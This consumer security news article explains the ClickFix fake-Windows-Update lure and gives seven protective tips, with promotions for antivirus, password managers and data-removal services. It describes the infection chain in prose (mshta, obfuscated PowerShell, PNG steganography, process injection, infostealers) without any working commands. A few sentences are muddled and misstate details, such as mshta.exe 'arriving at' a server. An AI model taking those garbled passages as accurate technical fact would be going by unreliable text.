Fake Windows Update Drives Malware in New ClickFix Attack
NEWNow you can listen to News articles!
Cybercriminals continue to get better at integrating them with the software you use every day.
In recent years, we’ve seen phishing pages copying banking portals, fake browser alerts claiming your device is infected, and “human verification” screens that force you to execute commands you should never touch. The latest twist comes from the ongoing ClickFix campaign.
Instead of asking you to prove you’re human, attackers now disguise themselves as a Windows update. It seems convincing enough that you can follow the instructions without thinking, which is exactly what they want.
Sign up to receive my FREE CyberGuy report
Get my best tech tips, urgent security alerts, and exclusive offers delivered right to your inbox. Plus, you’ll get instant access to my Ultimate Guide to Surviving Scams, free when you join me CYBERGUY.COM information sheet.
NEW SCAM SENDS FAKE MICROSOFT 365 LOGIN PAGES
The malware hides inside seemingly normal image files and uses steganography to bypass traditional security tools. (Microsoft)
How fake update works
The researchers noted that ClickFix has updated its old trick. The campaign used to rely on human verification pages, but now a full-screen Windows Update screen appears that looks almost identical to the real thing. Joe Security showed how the page displays fake progress bars, familiar update messages, and a message telling you to complete a critical security update.
If you’re on Windows, the site tells you to open the Run box, copy something from the clipboard, and paste it. That “something” is a command that silently downloads a dropper of malware. The final payload is usually an information stealer, which steals passwords, cookies, and other data from your machine.
NEW EMAIL SCAM USES HIDDEN CHARACTERS TO PASS FILTERS
Fake update screens are becoming harder to detect as attackers imitate Windows with near-perfect accuracy. (Joe Security)
The moment you paste the command, the infection chain begins. First, a file called mshta.exe arrives at a remote server and grabs a script. To avoid detection, these URLs typically use hexadecimal encoding for parts of the address and rotate their paths. The script then executes obfuscated PowerShell code filled with junk instructions to throw off investigators. Once PowerShell does its job, it decrypts a hidden .NET assembly that acts as a loader.
Why is this attack so difficult to detect?
The loader hides its next stage inside what looks like a normal PNG file. ClickFix uses custom steganography, which is a technique that hides secret data within normal-looking content. In this case, the malware is located within the pixel data of the image. Attackers modify color values in certain pixels, especially in the red channel, to embed shellcode fragments. When you see the picture, everything looks normal.
The script knows exactly where the hidden data is located. It extracts pixel values, decrypts them, and reconstructs the malware directly in memory. That means nothing obvious is written to the disk. Security tools that rely on file scanning miss this, as the shellcode never appears as a standalone file.
Once rebuilt, the shellcode is injected into a trusted Windows process such as explorer.exe. The attack uses familiar in-memory techniques such as VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread. Recent ClickFix activity has spawned infostealers like LummaC2 and updated versions of Rhadamanthys. These tools are designed to collect credentials and send them back to the attacker with very little noise.
Once the hidden code is loaded into a trusted Windows process, information thieves silently begin collecting your data. (Kurt “CyberGuy” Knutsson)
7 steps you can take to protect yourself from the ClickFix campaign
The best way to stay protected is to slow down for a moment and take some steps that will cut off these attacks before they start.
1) Never execute commands that you did not request
If any site asks you to paste a command into Run, PowerShell, or Terminal, treat it as an immediate warning sign. Actual OS updates never require you to run commands from a web page. When you execute that command, you hand over full control to the attacker. If something doesn’t work, close the page and don’t interact anymore.
2) Keep Windows Updates inside Windows
Updates should only come from the Windows Settings app or through official system notifications. A browser tab or pop-up window pretending to be a Windows update is always fake. If you see something outside of the normal update flow prompting your action, ignore it and check the actual Windows Update page yourself.
3) Use a trusted antivirus
Choose a security suite that can detect both file-based and memory-based threats. Stealth attacks like ClickFix avoid leaving obvious files for scanners to detect. Tools with behavior detection, sandboxing, and script monitoring give you a much better chance of detecting unusual activity early.
The best way to protect yourself from malicious links that install malware and potentially access your private information is to have powerful antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.
Get my picks for the best antivirus protection winners of 2025 for your Windows, Mac, Android, and iOS devices at Cyberguy.com.
4) Use a password manager
Password managers create strong, unique passwords for each account you use. They also auto-populate only on legitimate websites, helping you detect fake login pages. If an administrator refuses to fill out their credentials, check the URL before entering anything manually.
Next, check to see if your email has been exposed in previous breaches. Our #1 pick for password manager includes a built-in breach scanner that checks to see if your email address or passwords have appeared in known breaches. If you discover a match, immediately change any reused passwords and protect those accounts with new, unique credentials.
Check out the best expert-reviewed password managers of 2025 at Cyberguy.com.
5) Use a personal data deletion service
Many attacks start by targeting emails and personal data that are already exposed online. Data removal services help reduce your digital footprint by requesting removals from data broker sites that collect and sell your information. They can’t erase everything, but reducing your exposure means fewer attackers will have easy access to your data.
While no service can guarantee complete removal of your data from the Internet, a data deletion service is truly a smart choice. They are not cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically deleting your personal information from hundreds of websites. It’s what gives me peace of mind and has proven to be the most effective way to delete your personal data from the Internet. By limiting the information available, you reduce the risk of scammers cross-referencing leak data with information they can find on the dark web, making it harder for them to target you.
Check out my top picks for data removal services and get a free scan to find out if your personal information is already available on the web by visiting Cyberguy.com.
Get a free scan to find out if your personal information is already available on the web: Cyberguy.com.
6) Check URLs before trusting anything
A compelling design does not mean it is legitimate. Always look at the domain name first. If it doesn’t match the official site or uses strange spelling or extra characters, close it. Attackers rely on the fact that people recognize the layout of a page but ignore the address bar.
7) Close suspicious pages in full screen
Fake update pages often run in full screen mode to hide the browser interface and make the page look like part of your computer. If a site suddenly goes full screen without your permission, exit with Esc or Alt+Tab. Once you are out, scan your system and do not return to that page.
Kurt’s Key Takeaway
ClickFix works because it is based on user interaction. Nothing happens unless you follow the on-screen instructions. That makes the fake Windows Update page especially dangerous, because it takes advantage of something that most people trust. If you’re used to Windows updates freezing your screen, you can’t question the message that appears during the process. Cybercriminals know this. They copy trusted interfaces to let their guard down and then trust you to execute the final command. The technical tricks that follow are complex, but the starting point is simple. They need you to help them.
Have you ever copied commands from a website without thinking twice about what they do? Let us know by writing to us at Cyberguy.com.
CLICK HERE TO DOWNLOAD THE News APP
Sign up to receive my FREE CyberGuy report
Get my best tech tips, urgent security alerts, and exclusive offers delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Guide to Surviving Scams, free when you join me CYBERGUY.COM information sheet.
Copyright 2025 CyberGuy.com. All rights reserved.
Kurt “CyberGuy” Knutsson is an award-winning technology journalist with a deep love for technology, gear and devices that improve lives with his contributions to News and News Business since mornings on “News & Friends.” Do you have any technical questions? Get Kurt’s free CyberGuy newsletter, share your voice, a story idea or comment on CyberGuy.com.